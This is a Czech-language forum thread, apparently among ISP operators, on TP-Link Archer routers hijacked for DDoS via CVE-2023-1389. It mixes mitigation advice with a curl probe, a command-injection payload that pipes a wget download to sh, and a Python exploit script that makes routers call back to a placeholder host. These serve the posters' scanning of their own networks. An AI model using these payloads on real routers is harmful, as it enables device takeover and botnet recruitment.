Zranitelnost v routerech TP-Link (CVE-2023-1389)

kubajz · 2023-08-26T19:36:28+00:00

Ahoj, od pátku pozorujeme v síti DDoS z domácích routerů TPlink z portu 300 a 8085 (takže technicky vzato asi z jakéhokoliv). Zatím vím, že se to týká router...

kubajz

midnight_man
Dokonce máme případ, kdy to malware infikoval z vnitřní sítě, protože ta zranitelnost funguje z obou stran. Je to největší diletantsví inženýrů v TP-Linku, protože když vidím takový průser u jednoho modelu, tak se zákonitě podívám, jestli to náhodou neafektuje i podobné moje výrobky, že jo...

kubajz

midnight_man
vy přikazujete zákazníkům, co si připojí na veřejnou IP adresu? V rácmi síťové neutrality si zákazník zvolí koncové zařízení a zapojí. Co já si o tom myslím, je věc druhá.

kubajz

wwire
bohužel už je více než jasné, že se to týká prakticky všeho, co je "Archer". Fakt debilové v tom TPLinku

JanK

Nenapsali jste jiz někdo script na identifikaci zranitelných (CVE-2023-1389) TP-Linku v síti?
Případně nějaký nápad jak spolehlivě identifikovat ty již napadené?

kubajz

JanK ty infikované se identifikují těžko, protože útočník tam může spustit cokoliv. My tam máme brouka, co se maskuje jako /bin/watchdog. Killall -9 watchdog to vypne. Jinak sysupgrade -c umozni ulozeni modifikovanych konfiguracnich souboru. Takze je mozne zmenit i volby, ktere pres remote management nejde zmenit.

myghael

Zatím stačí podle MAC adresy identifikovat, že je to TP-Link, podle všeho jsou ale alespoň proti tomuto CVE bezpečné jen opravdu staré modely jako WR543G, ale těch už je velmi málo. Každý výrobce má jednou za čas nějaký průser, tentokrát to holt prasklo na TP-Link. Za ty peníze jsou ty routery dobré až až, hlavně pokud výrobce v rozumné době opraví tuto megadíru.

jnikles

kubajz Router je napadnutelný i když je administrace omezena na jednu adresu? Nebo to necháváte bez omezení?

Hrnicek

jnikles
podle toho co jsem vysledoval, tak update FW opravdu ničemu nepomůže, ovšem napadeny jsou podle všeho jen routery, které mají remote control IP adresu neomezenou. Ty, které mají specifickou IP zatím vypadají útokem nezasaženy.

jihi

curl -k -d @curl.payload -X POST "https://$1/cgi-bin/luci/;stok=/locale?form=country" -A "python-requests/2.21.0" -H 'Content-Type:' -H "Accept-Encoding: gzip, deflate" -H "Connection: keep-alive"

U těch které jsme měli napadené curl vrátí:
{"data":""}

Ale teda nepodařilo se mi spustit vlastní kód.

Detekce jde dělat podle počtu spojení. A u nás (ale tohle se asi může lišit) všechny útoky jdou z SRC PORT 80. Tím se celkem jednoduše z netflow uděla TOP statistika na základě SRC IP.

miract

jihi U těch které jsme měli napadené curl vrátí:

A u nenapadených to prosím vrátí co, ať vím, že ten test proběhl správně?

wwire

miract Typicky chybu 403 nebo 500

jihi

miract

Jsem se možná špatně vyjádřil. Ten string mi vrátí jakákoliv C6, i nenapadená.

U EX a EC modelů mi vrátí nějakou chybu 403, 500 atd... Ale teda musím říct, že tyto modely jsem u nás zatím napadené neviděl. Vše co jsme měli bylo C6, AX23, AX50.

TP-link co se týče zranitelných modelů zatím neodpověděl.

jcltm

gemb Tahle diskuze je věčná. To je sakra takový problém lidem vysvětlit, že k mobilům za 20k a notebookům za dalších 20k je prostě totální kravina pořizovat čínský krám za tisícovku? 100 Eur za Unifi prostě velký problém být nemůže, lepší jednou za 5-10 let koupit Unifi než kupovat každé 2-3 roky nový levný krám. 99% lidí kterým jsem tohle vysvětlil už ta cena Unifi nepřišla nijak strašná. Nejsme tak bohatí, abychom si mohli dovolit kupovat levné věci.
Já dávám do nenáročných domácností posledních několik let lepší ASUSy (dřív RT-AC66U/RT-AC68U, teď RT-AX56U/RT-AX58U aj. ) a musím zaklepat, problémy s tím prostě žádné nejsou. Wifi funguje parádně, SW podpora super (používám Merlin a jednou za čas všechny routery postupně aktualizuji), má to bezvadně fungující VPN (jak OpenVPN tak už teď i Wireguard), ani jednou jsem nemusel řešit napadnutí, a to jsou mnohé na veřejkách. Lze tam i dobře nastavit VPN klienty s policy routingem, abych mohl mít sítě za nimi přístupné z centrálního místa i tam kde jsou routery za NATem.
Do byť jen trochu náročnějších domácností a malých firem mám léty ověřenou kombinaci pfSense boxu + Unifi, to funguje parádně.

gemb

jcltm toto mi ani nehovor, ked bola diskusia o tarifoch tak z polky ludi tu vypadlo ze robia net za 300kc, klientela za 300kc si isto nekupi wifinu za 2500kc a viac.

mirmo80

jcltm Vysvetlit to nie je problem, problem je, ze ti ludia to bud neakceptuju, alebo tomu neveria. Vacsinou sa takato diskusia konci "ale ved to musi stacit" my aj tak nemame rychly internet 🙄. Nechapu, ze to s tym nesuvisi, ze to stacit nebude, ked sa na to doma vsetci pripoja. Ked si k nam ludia pridu kupit novy router, oci im okamzite padnu na tie za 20€ a tazko sa lamu na drahsie. "Priplatia" (aj ked z mojho pohladu, kupuju na dnesnu dobu standard) si len ti, ktori prichadzaju s poziadavkou "potrebujeme silnejsi wifi signal". S tymi sa uz da diskutovat a nechaju si vysvetlit ako to funguje.

miract

Asi si dnes sedím na vedení...

Warning: Couldn't read data from file "curl.payload", this makes an empty
Warning: POST.

jihi

miract
to má být soubor s obsahem toho POSTu

z toho se snažím spustit ten kód, to mi teda nejde
operation=write&country=$(id>wget <NECO KE STAZENI> -O-|sh)

pgb

@jihi děkuji, jeden for do bashe a prošel jsem všechny veřejky u nás za minutku a dobrý. Všechny se chovají jak mají až na jeden novej archer C6 😅 ... workaround kolem toho byla změna povolené remote ip a tím se to tomu curlu zavřelo

jnikles

zda se, ze ISP verze s agile firmware jsou v pohode, problem maji retailove verze.

jihi

import requests, urllib.parse, argparse
parser = argparse.ArgumentParser()

parser.add_argument("-r", "--router", dest = "router", default = "192.168.0.1", help="Router name")
parser.add_argument("-id", "--id", dest = "id", default = "1234", help="id for callback")

args = parser.parse_args()

revshell = urllib.parse.quote("wget http://MUJ.WEB/index.php?clbk=" + args.id);
url_command = "https://" + args.router + "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(" + revshell + ")"


r = requests.get(url_command, verify=False)
r = requests.get(url_command, verify=False)

Tohle je ještě kus pythonu vybrakovany odsud https://www.exploit-db.com/exploits/51677
Tohle mi už spouští kód na AX23,20 a 50
Mám tam zadaný wget na vlastní web kde si loguji přístupy dle toho "id" ktere se zadava. Asi dobrý postup je pustit ten curl na všechny IP a ty kde vrati ten string "data" ještě prozkoumat tímto pythonem.
Odhaduju, že útok na C6ky bude trochu jiný, ale dle chování myslím, že je také přes mng. vystavený do internetu.

jnikles

https://github.com/Voyag3r-Security/CVE-2023-1389

pomoci tohoto to jde rebootnout, nebo pustit jakykoli prikaz. Pokud zakazete spojeni smerem na tplink a rebootnete ho, prestane to chrlit bordel, protoze to nebude mit instrukce

vecino

Vím, že to není pro každého a kór u vás v tom velkým množství, ale já mám rád OpenWrt. Tp-Link měl i v nových fw hloupé chyby, že router neudržel Prefix delegation a podobné chyby... po přechodu na OpenWrt je to luxusní zařízení za pár kaček.

TP-Link Archer C6 v2: https://openwrt.org/toh/tp-link/archer_c6_v2
TP-Link Archer C6 v3: https://openwrt.org/toh/tp-link/archer_c6_v3

V podstatě o tom nevím dělá to co má. Pravidelné aktualizace. Ano nejsou podporována všechna zařízení.

« Předchozí stránka Další stránka »